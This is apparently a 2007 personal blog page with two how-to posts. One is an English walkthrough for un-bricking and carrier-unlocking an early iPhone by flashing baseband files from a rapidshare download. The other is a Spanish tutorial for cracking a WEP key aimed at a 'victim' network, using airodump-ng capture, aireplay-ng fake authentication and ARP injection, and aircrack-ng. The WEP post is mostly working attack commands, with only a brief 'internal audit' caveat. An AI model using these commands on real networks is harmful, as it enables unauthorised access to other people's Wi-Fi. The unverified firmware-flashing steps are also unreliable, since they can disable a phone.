miércoles, 12 de septiembre de 2007

Iphone Unbricked Method (No Service)




well, i will post the step.. it work for SOFTWARE and HARDWARE BRICK, it work for me and another ppl using Orion007 method for upload file to baseband.

when you have NO SERVICE and u have a succesfully unlock follow this:



for request of the people download link: http://rapidshare.com/files/55123388/eepfiles.zip.html

be carefull, file 3.12 is for firmware 1.0.0 and 3.14 for firmware 1.0.1 and 1.0.2
u need to use the file who correspond to your firmware.



1 first unload commcenter with this command
launchctl unload -w /System/Library/LaunchDaemons/com.apple.CommCenter.plist

2.enter to minicom and type
AT+CLCK="PN",0,"00000000"
it say error.... is OK!!

3.type AT+CLCK="PN",2 it say 0, (this show u have unlocked iphone)

4. run bbupdater -v

5.upload to the baseband this file ICE03.14.08_G.eep using this command
bbupdater -e ICE03.14.08_G.eep

6.restart the iphone and load the commcenter with this command
launchctl load -w /System/Library/LaunchDaemons/com.apple.CommCenter.plist

7.enjoy your unbricked iphone!!!... and unlocked of course!


Orion007 Pd: You get the .eep file from the apple 1.0.2 full restore image



pd2: if u have this error

Error: Baseband bootloader is too old; update to 1.8 or later and try again

follow this step:
bbupdater -f ICE03.14.08_G.fls (it locks again the iphone)
restore....
when u have the screen activation with the world back and it say incorrect sim but u have the at&t sim dont worry, activate it and do all the steps for unlock it again...

when u have it unlocked
follow the guide unbricked iphone

IF U DONT HAVE THIS ERROR DONT UPLOAD THE FLS BECAUSE IT LOCK THE IPHONE AGAIN.

and ppl remember LOAD THE COMMCENTER if u dont do it u NEVER have signal even is u reboot the iphone u need to load because it dont load automatically.



THANKS TO THE DEV TEAM, GEOHOT, ORION007 AND ALL THE PEOPLE IN UNDERNET #IPHONE.UNLOCK

lunes, 30 de julio de 2007

Activar Macbook Modo Monitor (Crack Wep)




Bueno, si su pregunta es puedo realizar captura de trafico e inyeccion a la vez con macbook desde linux.. la respuesta es SI ahi les explico como.... (Realizado en un macbook core duo).

Primero tienen q bajar gratuitamente el livecd Backtrack 2.0 desde este link http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso

1. bootear el livecd manteniendo la tecla C apretada hasta que bootee y vean un Boot:
2. En esta parte (Boot:) deberan ejecutar este comando bt noapic irqpoll acpi=force, este comando sirver para que no les dupliquen las teclas un bug que tiene backtrack.....
3. una vez dentro ejecutamos: modprobe ath_pci
4. despues paramos la interfaz wifi: airmon-ng stop ath0
5. ponemos en modo monitor la interfaz: airmon-ng start wifi0 9, es un cero despues de wifi por las dudas...
6. levantamos la interfaz: ifconfig ath0 up
7. hagamos de cuenta que ya ejecutamos kismet y vimos el canal de la victima y su ssid por ejemplo canal 1, ssid prueba, realizamos la captura de trafico con este comando: airodump-ng -c 1 -w dump ath0, -c seleccionas el canal con -w seleccionamos como se llama el archivo con la captura.
8. suponiendo que no hay ningun cliente conectado realizado un fake authentication con el siguiente comando: aireplay-ng -1 6000 -o 1 -q 10 -e prueba -a (aca ponen la macaddress del access point) -h (ponemos la mac address de nuestra tarjeta wifi) ath0, -e aca ponen el nombre del ssid, este comando envia paquetes keep alive para que poder realizar la inyeccion de trafico, antes del keep alive tienen q ver un succesfull ;-) o algo asi y despues lo keep alive...
9. ahora si a inyectar trafico!!! con este comando.. aireplay-ng -3 -b (mac address Acess point) -h (mac address tarjeta wifi) ath0, van a ver read packet y arp replay el arp replay va a estar en 0 pero esperan q en read packet llegue a 4000 paquetes o mas o menos depende..
10. bueno ahora volvemos a la terminal corriendo el airodump y vemos en la parte de data como sube calculen que para un clave de 64k necesitamos unas 100000 ivs o data como lo ven ahi.
11. mientras esta capturando podemos correr el aircrack y va desencriptando online mientras el airodump captura los paquetes... con este comando.. aircrack-ng -a 1 dump.cap

A disfrutarrrr!!!!!!!! aclaro... este tutorial sirve a modo de auditoria interna no hagan cagadassss.... ; D